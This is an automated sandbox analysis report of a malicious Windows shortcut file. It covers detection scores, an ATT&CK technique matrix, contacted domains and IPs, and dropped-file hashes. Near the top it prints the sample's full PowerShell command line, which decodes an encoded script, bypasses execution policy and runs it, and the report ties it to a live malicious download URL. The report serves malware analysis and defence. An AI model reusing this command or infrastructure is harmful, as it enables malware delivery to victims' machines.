Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command out-string -inputobject "srw735125373wm.lnk " | out-null; [system.text.encoding]::ascii.getstring([system.convert]::frombase64string('jfbyb2dyzxnzuhjlzmvyzw5jzt0iu2lszw50bhldb250aw51zsi7svdsigh0dha6ly9mb2n1c21lzgljys5pbi9mbwxpyi9jeejbqk1omekyy0xnm3fxmudwdi8glu91dezpbgugjgvudjpuru1ql3puc3jqzwnyvmiuze1vo1jlz3n2cjmylmv4zsakzw52olrftvavem5zclbly1hwyi5ktw8=')) > "c:\users\user\appdata\local\temp\gjrzeyudtv.ps1" ; powershell -executionpolicy bypass -file "c:\users\user\appdata\local\temp\gjrzeyudtv.ps1"; remove-item "c:\users\user\appdata\local\temp\gjrzeyudtv.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Command and Scripting Interpreter		1
Registry Run Keys / Startup Folder		11
Process Injection		1
Masquerading		OS Credential Dumping11
Security Software Discovery		Remote ServicesData from Local System3
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
PowerShell		1
DLL Side-Loading		1
Registry Run Keys / Startup Folder		31
Virtualization/Sandbox Evasion		LSASS Memory11
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		11
Process Injection		Security Account Manager31
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive13
Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Software Packing		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials21
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
DRlFlg7OV8.lnk62%VirustotalBrowse
DRlFlg7OV8.lnk67%ReversingLabsShortcut.Downloader.Powdow
DRlFlg7OV8.lnk100%AviraLNK/Runner.R
DRlFlg7OV8.lnk100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png.10%Avira URL Cloudsafe
http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/0%Avira URL Cloudsafe
http://focusmedica.in0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
focusmedica.in
166.62.28.147
truetrue
    		unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/true
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1305717837.000001A863082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A8716D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A871813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B93134000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B84900000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      http://www.apache.org/licenses/LICENSE-2.0.html.1powershell.exe, 00000000.00000002.1305717837.000001A861892000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://g.live.com/odclientsettings/Prod-C:edb.log.3.drfalse
            		high
            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://go.micropowershell.exe, 00000000.00000002.1305717837.000001A862292000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B83BB2000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contoso.com/powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://g.live.com/odclientsettings/ProdV2-C:svchost.exe, 00000003.00000003.1202965974.000001BD63262000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.drfalse
                    		high
                    https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1305717837.000001A863082000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A8716D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1360825800.000001A871813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B93134000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B84900000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://contoso.com/Licensepowershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://contoso.com/Iconpowershell.exe, 00000004.00000002.1268614512.0000027B92FF3000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://crl.ver)svchost.exe, 00000003.00000002.2436735024.000001BD5F065000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://focusmedica.inpowershell.exe, 00000004.00000002.1252433128.0000027B842E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B84574000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://aka.ms/pscore68powershell.exe, 00000000.00000002.1305717837.000001A861661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B82F81000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1305717837.000001A861661000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1252433128.0000027B82F81000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1252433128.0000027B831B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://github.com/Pester/Pester.1powershell.exe, 00000000.00000002.1305717837.000001A861892000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://pesterbdd.com/images/Pester.png.1powershell.exe, 00000000.00000002.1305717837.000001A861892000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown

                                    World Map of Contacted IPs

                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs

                                    Public IPs

                                    IPDomainCountryFlagASNASN NameMalicious
                                    166.62.28.147
                                    		focusmedica.inUnited States
                                    		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                    Private

                                    IP
                                    127.0.0.1

                                    General Information

                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1583270
                                    Start date and time:2025-01-02 10:03:58 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 4m 7s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:14
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:DRlFlg7OV8.lnk
                                    renamed because original name is a hash value
                                    Original Sample Name:09f44c33ba0a5f1e22cd5b8b0d40c9808e2668ee9050ac855a6ae0744bc9e924.lnk
                                    Detection:MAL
                                    Classification:mal100.evad.winLNK@7/12@1/2
                                    Cookbook Comments:
                                    • Found application associated with file extension: .lnk

                                    Warnings

                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 184.28.90.27, 172.202.163.200, 4.175.87.197
                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    04:04:32API Interceptor2x Sleep call for process: svchost.exe modified
                                    04:04:32API Interceptor69x Sleep call for process: powershell.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    166.62.28.1472022-04-26_1045.exe.lnkGet hashmaliciousEmotetBrowse
                                    • focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/

                                    Domains

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    focusmedica.in2022-04-26_1045.exe.lnkGet hashmaliciousEmotetBrowse
                                    • 166.62.28.147

                                    ASNs

                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    AS-26496-GO-DADDY-COM-LLCUSarm7.elfGet hashmaliciousMirai, MoobotBrowse
                                    • 192.169.229.195
                                    db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
                                    • 148.72.251.75
                                    https://chamberoflearning.com/n/?c3Y9bzM2NV8xX25vbSZyYW5kPU1uZ3phbkk9JnVpZD1VU0VSMTcxMjIwMjRVNTkxMjE3Mjk=N0123NCA_A8_CHF@emfa.ptGet hashmaliciousUnknownBrowse
                                    • 216.69.174.68
                                    https://www.gglusa.us/Get hashmaliciousUnknownBrowse
                                    • 68.178.157.109
                                    armv7l.elfGet hashmaliciousMiraiBrowse
                                    • 192.186.210.173
                                    armv6l.elfGet hashmaliciousUnknownBrowse
                                    • 68.178.185.215
                                    nabarm7.elfGet hashmaliciousUnknownBrowse
                                    • 198.71.185.150
                                    arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                    • 208.109.47.104
                                    https://www.asda.com@hnvs.xyz/asda-christmas-prizesGet hashmaliciousUnknownBrowse
                                    • 198.12.239.74
                                    https://disruptivc-dot-yamm-track.appspot.com/Redirect?ukey=1-0q8XPD2_exH3GZm9N9GPlcuW7DeTrX4WZWK6ta6DkQ-0&key=YAMMID-76523483&link=https://construction-sealants-ltd.jimdosite.comGet hashmaliciousHTMLPhisherBrowse
                                    • 118.139.179.98

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.7945862157861534
                                    Encrypted:false
                                    SSDEEP:3072:yJjAgNE4Pj5vHcjTcyBP9UjaaQ/ka4qWv:QAgN8nj/ka4
                                    MD5:ED127F28B4E44FA62295725A5EDD88A1
                                    SHA1:0F0E7A1150C3D3D6D8B46E256E761A44A040A22E
                                    SHA-256:F7E6D5B24F75CF4CF1F44228985B84E890153C0731AB48F520A3138B562DBA0C
                                    SHA-512:2EF317CD32B9621EECC8415254120723D038DD4B543E11376F9B8C158C256E6A58ED558B71BA77234442183E4F2937B2434A82315C20D79287BF53DC406E0C54
                                    Malicious:false
                                    Reputation:low
                                    Preview:..6.........@..@.....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................d6d6.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb78dd798, page size 16384, DirtyShutdown, Windows version 10.0
                                    Category:dropped
                                    Size (bytes):1310720
                                    Entropy (8bit):0.7864250612954311
                                    Encrypted:false
                                    SSDEEP:1536:DSB2ESB2SSjlK/6vDfi5Wy10MctJ+t9ka4XQ0/Ykr3g16L2UPkLk+kyt4eCu3uZB:Dazaovh7uka4Es2U1RFNp3pvHzrHBHz
                                    MD5:9B7A689488D6E8D19AF149716C423227
                                    SHA1:7D691C54C09AE6BC11FE8427B0FCD8ECF4B43737
                                    SHA-256:1D9FA2999BFA189F7AFE2688C97EE173B1FF6CB78F92DA3018B1205D42DD0CFF
                                    SHA-512:F20717A24AE120241159E6788DAA217EB3F48050AB7F580C11A4493F25AF1E5B850FD88B7BD1C9EFD85CB9B26CBEC9D71F52804DCF48959AFAC35C3195C0729D
                                    Malicious:false
                                    Reputation:low
                                    Preview:...... ...............X\...;...{......................0.z...... ...{.. ....}..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............{...............................................................................................................................................................................................2...{..................................7._. ....}.9................+..1 ....}...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                    C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                    Download File
                                    Process:C:\Windows\System32\svchost.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16384
                                    Entropy (8bit):0.08123128000202061
                                    Encrypted:false
                                    SSDEEP:3:UtGEYeyMWTMsjv/Ss/IGYZX/qzQzYE/lallSdLvl+/rS56/:UUEzPsYic0kAQN0e
                                    MD5:BEC063B02C07DB658EF05BDFA3BF92F7
                                    SHA1:AB2DDD8FEB39025FDF50FFC11DF1B32A71CFD643
                                    SHA-256:9DCE300D64045D43EE843A0399946CBCAC8A7834BFF3A2038FF575BA9544F57D
                                    SHA-512:C645ED13F90BF368CFBB5DD4C715F4B14B294EE70826661B35BACD8BEA65C9D619FC9B681FBFB239E5634456634ECB8881524248D876E9F0F4236E1BF33D73B9
                                    Malicious:false
                                    Reputation:low
                                    Preview:..o.....................................;...{.. ....}... ...{........... ...{... ...{..#.#.. ...{.|................+..1 ....}..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):16856
                                    Entropy (8bit):5.466119866901382
                                    Encrypted:false
                                    SSDEEP:384:D8ijriQMuHVViWG7dGE6XNqaJrYHnXH4vh5hPsTqN08Twf2QoipbX/Y:4wrzMCG05XNqa1aXUPxe8GpbA
                                    MD5:669016570F38709C899A9C9DE01FF084
                                    SHA1:F96CF9DD02B76BF734EC5E2CED33C4DC1AD3ED52
                                    SHA-256:D5E2B6AE80F8C265F6DAB0F1AF3FE814AAA1852AF06F8DB67D3D9F21B93D5F66
                                    SHA-512:ACDDF198AE0A9A0906096FC2F7C087D53AE0E9CA78668EFFD2D848EEE04BC1EEE63013C1906FA5D9C4E995BE68D024037091B23C60EA6AABCAAA1FBBF2FBDD1D
                                    Malicious:false
                                    Reputation:low
                                    Preview:@...e................................................@..........H...............o..b~.D.poM...)..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.............System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.4.................%...K... ...........System.Xml..@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bubrs4ao.s3u.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Reputation:high, very likely benign file
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hlwfaet1.ttd.psm1

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

